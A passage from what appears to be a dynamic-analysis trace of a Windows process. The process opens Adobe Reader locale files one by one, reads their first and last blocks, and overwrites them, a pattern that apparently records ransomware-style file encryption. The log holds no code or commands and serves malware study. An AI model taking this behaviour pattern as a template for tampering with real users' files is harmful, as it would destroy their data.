lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.053] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2400 [0075.053] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.053] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0075.054] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0075.054] CloseHandle (hObject=0x1fc) returned 1 [0075.054] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Multimedia.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\multimedia.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0075.055] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0075.055] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x13c00 [0075.055] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0075.055] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.055] ReleaseMutex (hMutex=0x168) returned 1 [0075.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.HUN", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0075.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.HUN", cchWideChar=14, lpMultiByteStr=0x1f7346c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.HUN", lpUsedDefaultChar=0x0) returned 14 [0075.056] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.677] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x12c00 [0075.678] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.678] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x12c00 [0075.679] WriteFile (in: hFile=0x1fc, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.680] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0075.680] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.680] CloseHandle (hObject=0x1fc) returned 1 [0075.681] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\SendMail.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\sendmail.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0076.058] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.059] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4000 [0076.059] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.059] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.059] ReleaseMutex (hMutex=0x168) returned 1 [0076.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.HUN", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.HUN", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.HUN", lpUsedDefaultChar=0x0) returned 12 [0076.059] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.064] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3000 [0076.065] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.068] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3000 [0076.068] WriteFile (in: hFile=0x1ec, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.069] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0076.069] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.069] CloseHandle (hObject=0x1ec) returned 1 [0076.069] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\AdobeCollabSync.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\adobecollabsync.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0076.070] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.070] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1a00 [0076.070] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.070] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.071] ReleaseMutex (hMutex=0x168) returned 1 [0076.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.ITA", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0076.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.ITA", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.ITA", lpUsedDefaultChar=0x0) returned 19 [0076.071] ReadFile (in: hFile=0x1ec, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2b1f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0076.073] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0076.073] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0076.073] CloseHandle (hObject=0x1ec) returned 1 [0076.074] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\IA32.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\ia32.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0076.079] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.079] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe00 [0076.079] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.079] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.079] ReleaseMutex (hMutex=0x168) returned 1 [0076.079] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.ITA", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0076.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.ITA", cchWideChar=8, lpMultiByteStr=0x1f7344c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.ITA", lpUsedDefaultChar=0x0) returned 8 [0076.080] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0076.082] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0076.082] WriteFile (in: hFile=0x1ec, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0076.083] CloseHandle (hObject=0x1ec) returned 1 [0076.083] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\SaveAsRTF.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\saveasrtf.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0076.084] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.084] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4a00 [0076.084] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.084] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.084] ReleaseMutex (hMutex=0x168) returned 1 [0076.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.ITA", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.084] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.ITA", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.ITA", lpUsedDefaultChar=0x0) returned 13 [0076.084] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.088] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3a00 [0076.088] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.092] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x3a00 [0076.093] WriteFile (in: hFile=0x1ec, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.093] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0076.093] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.093] CloseHandle (hObject=0x1ec) returned 1 [0076.094] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\accessibility.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\accessibility.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0076.098] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.098] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x7c00 [0076.099] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.099] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.099] ReleaseMutex (hMutex=0x168) returned 1 [0076.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.JPN", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.JPN", cchWideChar=17, lpMultiByteStr=0x1f88bcc, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.JPN", lpUsedDefaultChar=0x0) returned 17 [0076.099] ReadFile (in: hFile=0x1e8, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.101] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6c00 [0076.102] ReadFile (in: hFile=0x1e8, lpBuffer=0x2872fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.111] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6c00 [0076.111] WriteFile (in: hFile=0x1e8, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.112] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0076.112] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.112] CloseHandle (hObject=0x1e8) returned 1 [0076.113] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\eBook.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\ebook.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0076.113] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.114] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1800 [0076.114] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.114] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.114] ReleaseMutex (hMutex=0x168) returned 1 [0076.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.JPN", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0076.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.JPN", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.JPN", lpUsedDefaultChar=0x0) returned 9 [0076.114] ReadFile (in: hFile=0x1e8, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2b1f2bc*=0x1800, lpOverlapped=0x0) returned 1 [0076.122] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0076.122] WriteFile (in: hFile=0x1e8, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x1d88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1d88, lpOverlapped=0x0) returned 1 [0076.123] CloseHandle (hObject=0x1e8) returned 1 [0076.123] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\ReadOutLoud.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\readoutloud.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0076.124] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.124] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2400 [0076.124] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0076.124] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.124] ReleaseMutex (hMutex=0x168) returned 1 [0076.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.JPN", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0076.124] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.JPN", cchWideChar=15, lpMultiByteStr=0x1f7344c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.JPN", lpUsedDefaultChar=0x0) returned 15 [0076.125] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.127] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1400 [0076.127] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.128] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1400 [0076.128] WriteFile (in: hFile=0x1e8, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.129] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0076.129] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.129] CloseHandle (hObject=0x1e8) returned 1 [0076.129] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\updater.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 